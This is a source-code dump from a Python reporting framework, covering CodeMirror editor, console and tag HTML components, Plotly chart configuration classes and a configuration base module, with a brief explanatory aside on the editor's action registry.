:return: Javascript String of the data to be used in a jQuery call
:link ajax call: http://api.jquery.com/jquery.ajax/
"""
return "{ event_val: %(htmlId)s_editor.getValue(), event_code: '%(htmlId)s' }" % {"htmlId": self.htmlId}
@property
def jsClear(self):
return "%(htmlId)s_editor.setValue('')" % {"htmlId": self.htmlId}
def trigger(self, event):
if event in ['load', 'run']:
self._triggerEvents.add("$('#%(htmlId)s_%(action)s').trigger('click')" % {"htmlId": self.htmlId, "action": event})
else:
return super(Editor, self).trigger(event)
def onDocumentReady(self):
self.jsUpdateDataFnc = '''
%(pyCls)s(%(jqId)s, %(htmlId)s_data, %(jsStyles)s) ;
if(%(htmlCode)s != null) { %(breadCrumVar)s['params'][%(htmlCode)s] = %(jsVal)s };
''' % {'pyCls': self.__class__.__name__, 'jqId': self.jqId, 'htmlId': self.htmlId, 'htmlCode': json.dumps(self.htmlCode),
'jsVal': self.val, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar, 'jsStyles': json.dumps(self._jsStyles)}
if self.dataSrc is None or self.dataSrc.get('type') != 'url':
self.aresObj.jsOnLoadFnc.add(self.jsUpdateDataFnc)
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data, jsStyles)" % self.__class__.__name__, '''
if (window[htmlObj.attr('id') + '_editor'] == undefined) {
window[htmlObj.attr('id') + '_editor'] = CodeMirror.fromTextArea( htmlObj.get(0), {lineNumbers: true, mode: jsStyles.language} ) ; }
window[htmlObj.attr('id') + '_editor'].setValue(data);
if ($('#'+ htmlObj.attr('id') +'_save').length != 0) {
window[htmlObj.attr('id') + '_editor'].on('keydown', function(i, e) {
if (e.ctrlKey && e.keyCode == 83) {
e.preventDefault();
$('#'+ htmlObj.attr('id') +'_save').trigger('click'); }
}) ;
} ;
$('#'+ htmlObj.attr('id') +'_updated').text('Last update: ' + Today() ) ;
window[htmlObj.attr('id') + '_editor'].getWrapperElement().style["overflow"] = "hidden";
window[htmlObj.attr('id') + '_editor'].getWrapperElement().style["height"] = "100%"; ''')
def jsAction(self, jsFncs, icon, pyCssCls, tooltip, action):
"""
:category: Python function
:rubric: PY
    :example: >>> editor.jsAction(jsFncs, 'fas fa-save', 'CssSmallIcon', 'click to save changes', 'save')
    :dsc:
      Register an action icon on the editor component and bind the given javascript functions to its click event.
:return: The object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
if action not in self._definedActions:
self._definedActions.append(action)
self._jsActions[action] = "<span id='%(htmlId)s_%(action)s' title='%(tooltip)s' class='%(cssStyle)s %(icon)s'></span>" % {
"icon": icon, "cssStyle": self.addPyCss(pyCssCls), "htmlId": self.htmlId, 'tooltip': tooltip, 'action': action}
self.aresObj.jsOnLoadFnc.add("$('#%(htmlId)s_%(action)s').on('click', function(event) { %(jsFncs)s; })" % {"htmlId": self.htmlId, "jsFncs": ";".join(jsFncs), 'action': action})
return self
# --------------------------------------------------------------------------------------------------------------
# EDITOR STANDARD EVENTS
#
  # None of those functions are based on an Ajax call as I do not think they are supposed to do something special in case of
  # success or failure of an internal event. Problems are tackled in the standard way using the ares popup message (and the status for the color)
def save(self, jsFncs, icon='fas fa-save', pyCssCls="CssSmallIcon", tooltip='click to save changes'):
"""
:example: >>> editor.save( aresObj.jsPost( "/reports/create/script", [editor]) )
:wrap jsAction:
:return:
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
jsFncs = ["var data = %(data)s;" % {"data": self.jsQueryData}] + jsFncs
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'save')
def delete(self, jsFncs, icon='fas fa-times-circle', pyCssCls="CssSmallIconRed", tooltip='click to delete the function'):
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'delete')
def run(self, jsFncs, icon='fas fa-play', pyCssCls="CssSmallIcon", tooltip='Run button on the Editor Component'):
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'run')
def clone(self, jsFncs, icon='fas fa-copy', pyCssCls="CssSmallIcon", tooltip='Create a copy of the script'):
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'clone')
def load(self, jsFncs, icon='fas fa-sync', pyCssCls="CssSmallIcon", tooltip='Load button on the Editor Component', interval=5000):
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
jsFncs.append( "$('#%s_updated').text('Last update: ' + Today() )" % self.htmlId)
self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'load')
jsFncsAuto = ['''
$(this).toggleClass('fa-pulse');
if ( window['%(htmlId)s_interval'] == undefined) { window['%(htmlId)s_interval'] = setInterval( function() { $("#%(htmlId)s_load").trigger('click'); }, %(interval)s ); }
else {
if( $(this).hasClass('fa-pulse') ) { window['%(htmlId)s_interval'] = setInterval( function() { $("#%(htmlId)s_load").trigger('click'); }, %(interval)s ); }
else { clearInterval( window['%(htmlId)s_interval'] ) ;}} ; ''' % {'interval': interval, "htmlId": self.htmlId}]
return self.jsAction(jsFncsAuto, "fas fa-clock", pyCssCls, "Auto Update button on the Editor Component", 'auto')
def download(self, jsFncs='', icon='fas fa-file-download', pyCssCls="CssSmallIcon", tooltip='Download temporary version of the script'):
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
jsFncs.append("event.stopPropagation(); %s; return false;" % self.aresObj.jsDownload( fileName="tempScript.py", jsData="window['%s_editor'].getValue()" % self.htmlId))
    return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'download')
def __str__(self):
events = []
for action in self._definedActions:
if action in self._jsActions:
events.append( self._jsActions[action] )
return '''
<div style="display:inline-block;width:100%%;padding:5px 5px 5px 25px">
%(events)s
<span id='%(htmlId)s_updated' style='float:right;font-style:italic;margin-right:10px;display:inline-block:width:100%%'></span>
</div>
<textarea %(attr)s>%(vals)s</textarea>
''' % {'attr': self.strAttr(pyClassNames=self.__pyStyle), "vals": self.vals, 'htmlId': self.htmlId, 'events': "".join(events)}
class Console(AresHtml.Html):
"""
"""
name, category, callFnc, docCategory = 'Python Cell Runner', 'Text', 'pytestcell', 'Preformatted'
__reqCss, __reqJs = ['codemirror'], ['codemirror']
def __init__(self, aresObj, vals, size, width, widthUnit, height, heightUnit, isEditable, htmlCode):
super(Console, self).__init__(aresObj, vals, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self.size, self.isEditable = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size, isEditable
self._jsRun, self._jsSave = '', ''
self.addGlobalVar("%s_count" % self.htmlId, "0")
self.css({'font-size': self.size, 'padding': '10px', "min-height": "30px", "font-family": "Arial, monospace"})
@property
def val(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.val
:dsc:
Return the value of the In[] section of the editor.
:return: A String with the javascript function to get the value
"""
return '%(htmlId)s_editor.getValue()' % {"htmlId": self.htmlId}
@property
def jsQueryData(self):
"""
:category: Javascript features
:rubric: JS
:dsc:
String with the javascript feature to get the data to send when a event is triggered from this object.
Basically when the run or saved is triggered
:return: Javascript String of the data to be used in a jQuery call
:link ajax call: http://api.jquery.com/jquery.ajax/
"""
return "{ event_out: $('#%(htmlId)s_result_data').text(), event_val: %(htmlId)s_editor.getValue(), event_code: '%(htmlId)s' }" % {'htmlId': self.htmlId}
# --------------------------------------------------------------------------------------------------------------
# EDITOR STANDARD EVENTS
#
  # Those already embed an Ajax call as by default the return of those calls will change the display.
  # Make sure you are not calling an Ajax call within an Ajax call; the event engine should remain simple.
  # Remember PEP20: Simple is better than complex.
def run(self, url=None, jsData=None, jsFncs=None, httpCodes=None, tooltip="Run the line"):
"""
:category: Javascript Event
:rubric: JS
:example: >>> myObj.run( "/reports/fncs/run/%s" % report_name )
:dsc:
Add an event action to the console object.
:return: The python object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs] if jsFncs is not None else []
jsFncs = [
"if (!data.status){ $('#%(htmlId)s_result_data').css('color', '%(redColor)s') ; } else { $('#%(htmlId)s_result_data').css('color', '%(blackColor)s') }" % {"htmlId": self.htmlId, 'redColor': self.getColor('redColor', 4), 'blackColor': self.getColor('greyColor', 8) },
"%(htmlId)s_count ++; $('#%(htmlId)s_counter').text( 'In [ '+ %(htmlId)s_count +']' )" % {"htmlId": self.htmlId},
"$('#%(htmlId)s_result_data').text(data.output); $('#%(htmlId)s_print_data').text(data.print);" % {"htmlId": self.htmlId}] + jsFncs + ["$('#%(htmlId)s_result').show();$('#%(htmlId)s_print').show();" % {"htmlId": self.htmlId} ]
self._jsRun = (self.aresObj.jsPost(url=url, jsData=jsData, jsFnc=jsFncs, httpCodes=httpCodes) if url is not None else ";".join(jsFncs), tooltip)
return self
def save(self, url=None, jsData=None, jsFncs=None, httpCodes=None, tooltip="Save the run"):
"""
:category: Javascript Event
:rubric: JS
:example: >>> myObj.run( "/reports/fncs/test/%s" % report_name )
:dsc:
Add an event action to the console object to save the result of the In and out.
:return: The python object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs] if jsFncs is not None else []
self._jsSave = (self.aresObj.jsPost(url=url, jsData=jsData, jsFnc=jsFncs, httpCodes=httpCodes) if url is not None else ";".join(jsFncs), tooltip)
return self
def __str__(self):
runButton, saveButton = '', ''
if self._jsRun != '':
self.aresObj.jsOnLoadFnc.add('''
var %(htmlId)s_editor = CodeMirror.fromTextArea( $('#%(htmlId)s').get(0), {placeholder: "aresObj.myFncs()", lineNumbers: true, mode: 'python'} ) ;
%(htmlId)s_editor.setSize(null, 30); %(htmlId)s_editor.getWrapperElement().style["line-height"] = "1.5"; %(htmlId)s_editor.refresh() ;
%(htmlId)s_editor.on('keydown', function(i, e) {
if (e.keyCode == 13) { var data = %(data)s ; e.preventDefault(); %(run)s ;}
else {
$('#%(htmlId)s_result_data').text(''); $('#%(htmlId)s_print_data').text('');
$('#%(htmlId)s_result').hide(); $('#%(htmlId)s_print').hide();}
}) ;
$('#%(htmlId)s_run').on('click', function(event) { var data = %(data)s ; %(run)s ; })''' % {"htmlId": self.htmlId, "run": self._jsRun[0], 'data': self.jsQueryData})
runButton = '<i title="%(tooltip)s" id="%(htmlId)s_run" class="%(iconCss)s fas fa-caret-right"></i>' % {'tooltip': self._jsRun[1], "htmlId": self.htmlId, "iconCss": self.addPyCss('CssStdIcon')}
if self._jsSave != '':
self.aresObj.jsOnLoadFnc.add('''
$('#%(htmlId)s_save').on('click', function(event) { var data = %(data)s ; %(save)s ; })''' % {
"htmlId": self.htmlId, "save": self._jsSave[0], 'data': self.jsQueryData})
saveButton = '<i title="%(tooltip)s" id="%(htmlId)s_run" class="%(iconCss)s far fa-save"></i>' % {'tooltip': self._jsSave[1], "htmlId": self.htmlId, "iconCss": self.addPyCss('CssOutIcon')}
return '''
<table style="width:100%%;margin-top:10px;padding:5px 0 5px 10px">
<tr>
<td style="height:100%%;width:100px;border-left:5px solid %(blueColor)s;vertical-align:middle;color:%(blueColor)s">
<span title="count number of runs" id="%(htmlId)s_counter" >In [ 0 ]</span>
%(runButton)s
</td>
<td class="%(tdRunCss)s"><textarea %(attr)s></textarea></td>
</tr>
<tr style="height:3px;display:inline-block"></tr>
<tr style="display:none" id="%(htmlId)s_result">
<td style="padding-top:10px;padding-bottom:10px;height:100%%;width:100px;border-left:5px solid blue;vertical-align:middle;color:red">
<span title="Number of store results">Out [ 0 ]</span>
%(saveButton)s
</td>
<td class="%(tdRunCss)s" id="%(htmlId)s_result_data"></td>
</tr>
<tr style="display:none;" id="%(htmlId)s_print">
<td colspan=2 style="height:100px;">
<div style="width:100%%;height:100%%;background-color:%(blackColor)s;color:%(whiteColor)s;text-align:left;padding:5px;margin-top:10px" id="%(htmlId)s_print_data" >
Server logs generated from the print command
</div>
</td>
</tr>
</table>
''' % {'attr': self.strAttr(), 'htmlId': self.htmlId, 'runButton': runButton, 'tdRunCss': self.addPyCss('CssTdEditor'), 'saveButton': saveButton,
'blackColor': self.getColor('greyColor', 8), 'whiteColor': self.getColor('greyColor', 0),
'redColor': self.getColor('redColor', 2), 'blueColor': self.getColor('blueColor', 8)}
class Tags(AresHtml.Html):
name, category, callFnc, docCategory = 'Tags', 'Text', 'tags', 'Preformatted'
__pyStyle = ['CssDivNoBorder']
"""
check unicity
remove all items
"""
def __init__(self, aresObj, vals, title, icon, width, widthUnit, height, heightUnit, htmlCode):
super(Tags, self).__init__(aresObj, vals, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self.title, self.icon = title, icon
self.css( {"margin-top": "5px"})
@property
def val(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.val
:returns: Javascript string with the function to get the current value of the component
:dsc:
Property to get the jquery value of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
"""
return "%(breadCrumVar)s['params']['%(htmlId)s']" % {"htmlId": self.htmlId, "breadCrumVar": self.aresObj.jsGlobal.breadCrumVar}
@property
def json(self):
return "JSON.stringify(%(breadCrumVar)s['params']['%(htmlId)s'])" % {"htmlId": self.htmlId, "breadCrumVar": self.aresObj.jsGlobal.breadCrumVar}
def jsEmpty(self):
return "%(breadCrumVar)s['params']['%(htmlId)s'] = []; $('#%(htmlId)s_tags').text('')" % {"htmlId": self.htmlId, "breadCrumVar": self.aresObj.jsGlobal.breadCrumVar}
def jsAdd(self, jsData='data', jsDataKey=None, isPyData=False):
if isPyData:
jsData = json.dumps(jsData)
else:
if jsDataKey is not None:
jsData = "%s['%s']" % (jsData, jsDataKey)
self.addGlobalFnc('RemoveSelection(srcObj, htmlId)', '''
const index = %(breadCrumVar)s['params'][htmlId].indexOf(srcObj.parent().text());
%(breadCrumVar)s['params'][htmlId].splice(index, 1);
srcObj.parent().remove(); ''' % {'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar},
fncDsc="Remove the item from the Tags Html component but also from the underlying javascript variable")
return '''
if (%(breadCrumVar)s['params']['%(htmlId)s'] == undefined) {%(breadCrumVar)s['params']['%(htmlId)s'] = [] ;}
if (! %(breadCrumVar)s['params']['%(htmlId)s'].includes( %(jsData)s ) ) { %(breadCrumVar)s['params']['%(htmlId)s'].push(%(jsData)s);
$('#%(htmlId)s_tags').append("<span style='margin:2px;background:%(baseColor)s;color:%(whiteColor)s;border-radius:8px;1em;vertical-align:middle;display:inline-block;padding:0 2px 1px 10px;cursor:pointer'>"+ %(jsData)s +"<i onclick='RemoveSelection($(this), \\\"%(htmlId)s\\\")' style='margin-left:10px' class='far fa-times-circle'></i></span>");} ;
''' % {"htmlId": self.htmlId, "jsData": jsData, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar, 'whiteColor': self.getColor('greyColor', 0), "baseColor": self.getColor("baseColor", 0)}
def __str__(self):
return '''
<div %(attr)s>
<div style='margin:0;display:inline-block;vertical-align:middle;width:90px;float:left;padding:2px 5px 0 5px;height:30px;border:1px solid %(greyColor)s'>
<i class="%(icon)s" style="margin-right:10px"></i>%(title)s</div>
<div id='%(htmlId)s_tags' style='padding:2px 5px 0 5px;border:1px solid %(greyColor)s;height:30px'></div>
</div>''' % {"attr": self.strAttr(pyClassNames=self.pyStyle), "title": self.title, 'icon': self.icon, 'htmlId': self.htmlId, 'greyColor': self.getColor("greyColor", 2) }
```
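
All the Editor buttons above (save, run, clone, load, delete, download) funnel through `jsAction()`, which stores one icon snippet per action name and renders them in the order declared in `_definedActions`. A standalone sketch of that registry pattern, stripped of the jQuery wiring (class and method names here are illustrative, not the library's):

```python
class ActionBar:
    """Sketch of the action registry used by Editor.jsAction above."""
    def __init__(self):
        # default ordering, mirroring Editor._definedActions
        self._defined_actions = ['run', 'load', 'auto', 'clone', 'save', 'delete']
        self._js_actions = {}

    def js_action(self, action, icon, tooltip):
        if action not in self._defined_actions:
            self._defined_actions.append(action)  # new actions render last
        self._js_actions[action] = "<span title='%s' class='%s'></span>" % (tooltip, icon)
        return self

    def render(self):
        # only actions actually registered produce markup, in declaration order
        return "".join(self._js_actions[a] for a in self._defined_actions if a in self._js_actions)

bar = ActionBar().js_action('save', 'fas fa-save', 'click to save changes')
print(bar.render())  # <span title='click to save changes' class='fas fa-save'></span>
```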
#### File: js/configs/JsConfigPlotly.py
```python
from ares.Lib.js.configs import JsConfig
DSC = {
}
class JsBase(JsConfig.JsConfig):
""" Base Class for the Plotly Charts """
listAttributes = []
jsCls = 'Chart'
reference = None # The main link to get the documentation of this chart
  _statics = None # Static configuration will be added to each data set automatically
_layout = None # Change the layout properties of the chart
jsType = None # Attach the chart to a family for the data transformation
def __init__(self, aresObj, data, seriesProperties):
super(JsBase, self).__init__(aresObj, data, seriesProperties)
for key, val in self._attrs.items():
self.seriesProperties.setdefault('static', {})[key] = val
self.config()
def config(self):
if self._statics is not None:
self.seriesProperties["static"].update(self._statics)
def _colors(self, cList, index=None):
"""
:category: Chart Colors
:rubric: JS
:type: Configuration
:dsc:
Internal function to allow the change of colors of the different series in a Plotly chart.
Plotly configuration is using the internal variable seriesProperties in order to add the properties once
the Javascript function has aggregated the different values.
"""
if index is not None:
if not "marker" in self.__chart.seriesProperties["static"]:
self.seriesProperties["static"]["marker"] = {'color': [cList]}
else:
for i in range(len(self.data._schema['out']['params'][0])):
self.seriesProperties["dynamic"].setdefault(i, {})["marker"] = {'color': cList[i]}
# ---------------------------------------------------------------------------------------------------------
# Plotly Configurations
# ---------------------------------------------------------------------------------------------------------
class JsBar(JsBase):
""" Configuration for a Bars Chart in Plotly """
alias = 'bar'
name = 'Bars'
_attrs = {'type': 'bar'}
reference = "https://plot.ly/javascript/bar-charts/"
class JsHBar(JsBase):
""" Configuration for a Horizontal Bars Chart in Plotly """
alias = 'hbar'
name = 'Horizontal Bars'
_attrs = {'orientation': 'h', 'type': 'bar'}
reference = "https://plot.ly/javascript/bar-charts/"
class JsPie(JsBase):
""" Configuration for a Pie Chart in Plotly """
alias = 'pie'
name = 'Pie'
_attrs = {'type': 'pie'}
reference = 'https://plot.ly/javascript/pie-charts/'
def _colors(self, cList, index=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
    :dsc:
      Internal function to allow the change of the slice colors in a Plotly pie chart.
    """
if index is not None:
if not "marker" in self.__chart.seriesProperties["static"]:
self.seriesProperties["static"]["marker"] = {'colors': cList}
else:
for i in range(len(self.data._schema['out']['params'][0])):
self.seriesProperties["dynamic"].setdefault(i, {})["marker"] = {'colors': cList}
class JsDonut(JsPie):
""" Configuration for a Donut Chart in Plotly """
alias = 'donut'
name = 'Donut'
_attrs = {'hole': '.4', 'type': 'pie'}
reference = 'https://plot.ly/javascript/pie-charts/'
#---------------------------------------------------------------------------------------------------------
# LINE CHARTS
#
class JsMulti(JsBase):
""" Configuration for a Multi Chart in Plotly """
alias = 'multi'
name = 'Multi Series'
_attrs = {'type': 'scatter'}
class JsLine(JsBase):
""" Configuration for a Linea Chart in Plotly """
alias = 'line'
name = 'Line Series'
_attrs = {'type': 'scatter'}
class JsScatter(JsBase):
""" Configuration for a Scatter Chart in Plotly """
alias = 'scatter'
name = 'Scatter Series'
_attrs = {'mode': 'markers+text', 'type': 'scatter'}
class JsArea(JsBase):
""" Configuration for a Horizontal Bars Chart in Plotly """
alias = 'area'
name = 'Area Series'
_attrs = {'fill': 'tonexty', 'mode': 'none'}
class JsBubble(JsBase):
""" Configuration for a Bubble Chart in Plotly """
alias = 'bubble'
name = 'Bubble Chart'
_attrs = {'mode': 'scatter'}
def config(self):
for i in range(len(self.data._schema['out']['params'][0])):
self.seriesProperties['dynamic'][i] = {'marker': {'size': [1, 4, 50]}, 'mode': 'markers'}
#---------------------------------------------------------------------------------------------------------
# STATISTIC CHARTS
#
class JsBox(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'box'
name = 'Basic Box Series'
_attrs = {'type': 'box'}
reference = "https://plot.ly/javascript/box-plots/"
_statics = {"boxpoints": 'all'}
class JsHBox(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'hbox'
name = 'Horizontal Box Series'
_attrs = {'type': 'box'}
reference = "https://plot.ly/javascript/box-plots/"
class JsSankey(JsBase):
""" Configuration for a Sankey Chart in Plotly """
alias = 'sankey'
name = 'Sankey Series'
_attrs = {'type': 'sankey'}
reference = "https://plot.ly/javascript/sankey-diagram/"
class JsParallelCoordinates(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'parcoords'
name = 'Parallel Coordinates Series'
_attrs = {'type': 'parcoords'}
reference = "https://plot.ly/javascript/parallel-coordinates-plot/"
class JsParallelCategory(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'parcats'
name = 'Basic Parallel Categories Diagram'
_attrs = {'type': 'parcats'}
reference = "https://plot.ly/javascript/parallel-categories-diagram/"
#---------------------------------------------------------------------------------------------------------
# MAPS / HEATMAPS CHARTS
#
class JsMaps(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'choropleth'
name = 'Country GDP Choropleth Map'
_attrs = {'type': 'choropleth', "locationmode": 'country names', "autocolorscale": False,}
reference = "https://plot.ly/javascript/choropleth-maps/"
class JsMapsEurope(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'europe'
jsType = 'choropleth'
name = 'Country GDP Choropleth Map'
_attrs = {'type': 'choropleth', "locationmode": 'country names', "autocolorscale": False,}
reference = "https://plot.ly/javascript/choropleth-maps/"
_layout = {"geo": {"showland": True, "projection": {"type": "Mercator"}, "scope": "europe", "showcoastlines": True, "showframe": True}}
class JsHeatMap(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'heatmap'
  name = 'Heatmap'
_attrs = {'type': 'heatmap', 'showscale': False}
reference = "https://plot.ly/javascript/heatmaps/"
#---------------------------------------------------------------------------------------------------------
# 3D CHARTS
#
class JsSurface(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'surface'
name = 'Surface Plot'
_attrs = {'type': 'surface', 'opacity': 0.9}
reference = "https://plot.ly/javascript/3d-surface-plots/"
class JsSurfaceBorder(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'surface-contours'
name = 'Surface Plot'
_attrs = {'type': 'surface'}
reference = "https://plot.ly/javascript/3d-surface-plots/"
_statics = {'contours': {'z': {
'show': True, 'usecolormap': True, 'highlightcolor': "#42f462", 'project':{ 'z' : True}}}}
class JsScatter3D(JsBase):
""" Configuration for a Box Chart in Plotly """
alias = 'scatter3d'
name = '3D Point Clustering'
_attrs = {'type': 'scatter3d'}
reference = "https://plot.ly/javascript/3d-point-clustering/"
_layout = {'showlegend': False}
def _colors(self, cList, indices=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
    :dsc:
      Internal function to allow the change of the marker colors for one or several series in a Plotly 3D scatter chart.
    """
if indices is not None:
if not isinstance(indices, list):
indices, cList = [indices], [cList]
      for i, index in enumerate(indices):
        self.seriesProperties["dynamic"].setdefault(index, {}).setdefault("marker", {}).update({'color': cList[i]})
else:
for i in range(len(self.data._schema['out']['params'][0])+1):
self.seriesProperties["dynamic"].setdefault(i, {})["marker"] = {'color': cList[i]}
class JsLine3D(JsScatter3D):
""" Configuration for a Box Chart in Plotly """
alias = 'line3d'
jsType = 'scatter3d'
  name = '3D Lines'
_attrs = {'type': 'scatter3d', 'opacity': 1, 'mode': 'lines'}
class JsMesh3D(JsScatter3D):
""" Configuration for a Box Chart in Plotly """
alias = 'mesh3d'
name = '3D Clustering'
_attrs = {'type': 'mesh3d'}
reference = "https://plot.ly/javascript/3d-point-clustering/"
_layout = {'showlegend': False, 'autosize': True}
_statics = {'opacity': 0.1}
if __name__ == "__main__":
configObj = JsBar(None, [], {})
#lineChart.addAttr('pattern', ['yellow'], 'color')
print(configObj)
```
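
Every configuration class above is registered automatically by the factory in `JsConfig.getConfigs()` as long as it exposes a unique `alias`. A minimal sketch of a bespoke addition following the same pattern (the `JsWaterfall` class, its alias and the chart type are hypothetical, not part of the file):

```python
from ares.Lib.js.configs import JsConfigPlotly

class JsWaterfall(JsConfigPlotly.JsBase):
    """ Hypothetical configuration for a Waterfall Chart in Plotly """
    alias = 'waterfall'             # must be unique within the Plotly family
    name = 'Waterfall'
    _attrs = {'type': 'waterfall'}  # merged into each series via seriesProperties['static']
    reference = "https://plot.ly/javascript/waterfall-charts/"
```

Such a class would then be hooked in from a report via the entry point described in `JsConfig.getConfig()`, e.g. `aresObj.addChartConfig(JsWaterfall, 'Plotly')`.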
#### File: js/configs/JsConfig.py
```python
import json
import importlib
import inspect
import sys
from ares.Lib.js import AresJsEncoder
factory = None
def getConfigs(libraries):
"""
:category: Factory
:rubric: JS
:type: Configuration
:dsc:
  Load the factory with all the different javascript configurations for the different HTML components.
  Some components like charts, tables, pivots and lists are bespoke and would require extra tuning according to the need.
  This module in the framework will segregate all the different official configurations. Some bespoke ones can be
  added in the reports using the available hooks for each type of component
:return: The content of the factory
"""
global factory
if factory is None:
tmpFactory = {}
for libConfig in libraries:
chartMod = importlib.import_module('ares.Lib.js.configs.JsConfig%s' % libConfig)
for name, chartCls in inspect.getmembers(sys.modules[chartMod.__name__]):
chartAlias = getattr(chartCls, 'alias', None)
if chartAlias is not None:
if chartAlias in tmpFactory.get(libConfig, {}):
raise Exception("Duplicated Name - Chart %s in %s cannot be replaced !!!" % (chartAlias, libConfig))
tmpFactory.setdefault(libConfig, {})[chartAlias] = chartCls
factory = tmpFactory
return factory
def getConfig(pyCls, chartFam):
"""
:category: Chart Bespoke Configuration
:rubric: JS
:type: Framework Extension
:example: aresObj.addChartConfig(JsTestHBar, 'ChartJs')
:dsc:
Entry point to allow the add of bespoke configurations. Those configurations should be linked to an alias which has
to be unique. From this entry point it is not possible to update existing configurations.
Those configurations should follow the defined class structure in order to be then easily added to the framework in the
next release.
The entry point of this function in the framework is in the function aresObj.addChartConfig in the framework
"""
chartMod = importlib.import_module('ares.Lib.js.configs.JsConfig%s' % chartFam)
return type(pyCls.__name__, (pyCls, chartMod.JsBase), {})
class JsConfig(dict):
"""
:category: Javascript Wrapper
:rubric: JS
:type: System
:dsc:
  Base class in charge of the conversion of Python configurations to Javascript ones.
  Those configurations defined on the Python side will only be used and visible on the Javascript side.
  This class will build a dictionary of valid parameters for the Javascript layer.
  ## Class Parameters
  - aresObj: The unique AReS object, shared with all the different objects in the framework
  - seriesProperties: Dictionary with configuration to be added after the Javascript data transformation to the object
  - data: The Python data structure which will be added to the data section of the Javascript chart
  ## Special static class variables
  Those variables are properties of the class and should not be changed directly. Some methods are available
  in order to add bespoke configuration to the chart or to the series, like addAttr() and addSeriesAttr().
  If something seems to be missing, please never change those variables and either create a new bespoke configuration
  or talk to your IT team.
  - _attrs, Chart properties and styles
  - _statics, parameters added to each series at the end of the data build
  The different Javascript structures are defined by the charting libraries
"""
def __init__(self, aresObj, data, seriesProperties):
self.aresObj, self.seriesProperties = aresObj, seriesProperties
resolvedAttrs = {}
self.rAttr(self._attrs, resolvedAttrs)
if getattr(self, '_statics', None) is not None:
seriesProperties.setdefault('static', {}).update(self._statics)
self.update(resolvedAttrs)
self.data = self.transformation(data)
self.config()
def config(self): pass
def rAttr(self, srcVals, dstVals, srcKey=None):
"""
:category:
:rubric: PY
:type: System
:dsc:
"""
if isinstance(srcVals, dict):
for key, val in srcVals.items():
if isinstance(val, dict):
dstVals[key] = {}
self.rAttr(val, dstVals[key])
else:
self.rAttr(val, dstVals, key)
elif isinstance(srcVals, list):
dstVals[srcKey] = []
for val in srcVals:
dstVals[srcKey].append({})
self.rAttr(val, dstVals[srcKey][-1])
else:
if srcKey is not None:
if isinstance(srcVals, str):
if srcVals.startswith("function") or srcVals.startswith("JSON.stringify"):
dstVals[srcKey] = srcVals
else:
dstVals[srcKey] = json.dumps(srcVals)
else:
dstVals[srcKey] = json.dumps(srcVals)
elif isinstance(dstVals, list):
dstVals.append(json.dumps(srcVals))
def toJs(self, options=None): return self
@classmethod
def transformation(cls, data):
"""
:category: Data Transformation
:rubric: PY
:type: Transformation
:dsc:
      Data transformation for the DataFrame. Using this function might create a new DataFrame. Thus a new Javascript
      object will be created and the logic within the global filters might not work correctly.
      If you use this, please make it obvious to ensure other users are not surprised
"""
return data
def addAttr(self, key, val, tree=None, category=None, isPyData=True):
    if isinstance(key, dict):
      for k, v in key.items():
        self.addAttr(k, v, category=category, isPyData=isPyData)
      return
if isPyData:
val = json.dumps(val, cls=AresJsEncoder.AresEncoder)
if category is None and tree is not None:
category, tree = tree, None
if tree is not None:
chartLocation = self[category]
if not isinstance(tree, list):
tree = [tree]
for subCategory in tree:
if isinstance(subCategory, tuple):
subCategory, subCategoryIndex = subCategory
else:
subCategory, subCategoryIndex = subCategory, 0
if subCategory in self.listAttributes:
if not subCategory in chartLocation:
chartLocation[subCategory] = []
for i in range(subCategoryIndex + 1):
chartLocation[subCategory].append({})
if len(chartLocation[subCategory]) < subCategoryIndex + 1:
for i in range(subCategoryIndex + 1):
if i not in chartLocation[subCategory]:
chartLocation[subCategory].append({})
chartLocation = chartLocation[subCategory][subCategoryIndex]
else:
if not subCategory in chartLocation:
chartLocation[subCategory] = {}
chartLocation = chartLocation[subCategory]
if isinstance(chartLocation, list):
chartLocation[0][key] = val
else:
chartLocation[key] = val
elif category is not None:
self.setdefault(category, {})[key] = val
else:
self[key] = val
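# Illustrative sketch (not part of the original module): how addAttr resolves the
# category / tree arguments above. The attribute names below are hypothetical and
# only chosen to show the nesting logic.
#   cfg.addAttr('display', False, category='legend')
#   # -> self['legend'] = {'display': json.dumps(False)}
#   cfg.addAttr('fontSize', 12, tree='labels', category='legend')
#   # -> self['legend']['labels'] = {'fontSize': json.dumps(12)}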
def delAttr(self, keys, tree=None, category=None):
""" """
chart = self
if tree is not None:
chartLocation = self.get(category, {})
for subCategory in tree:
chartLocation = chartLocation.get(subCategory, {})
chart = chartLocation
if category is not None:
chart = self.get(category, {})
